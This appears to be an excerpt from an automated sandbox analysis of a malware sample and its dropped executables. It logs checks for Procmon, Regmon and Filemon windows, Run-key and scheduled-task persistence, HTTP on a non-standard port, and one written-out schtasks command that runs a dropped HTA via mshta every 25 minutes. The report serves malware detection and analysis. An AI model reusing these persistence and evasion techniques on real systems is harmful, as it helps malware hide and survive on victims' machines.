Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f

Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0436fcd702.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0436fcd702.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48b7eec64e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48b7eec64e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f8fdf848d8.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f8fdf848d8.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ec93a94e48.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ec93a94e48.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50145

Source: C:\Users\user\Desktop\random.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
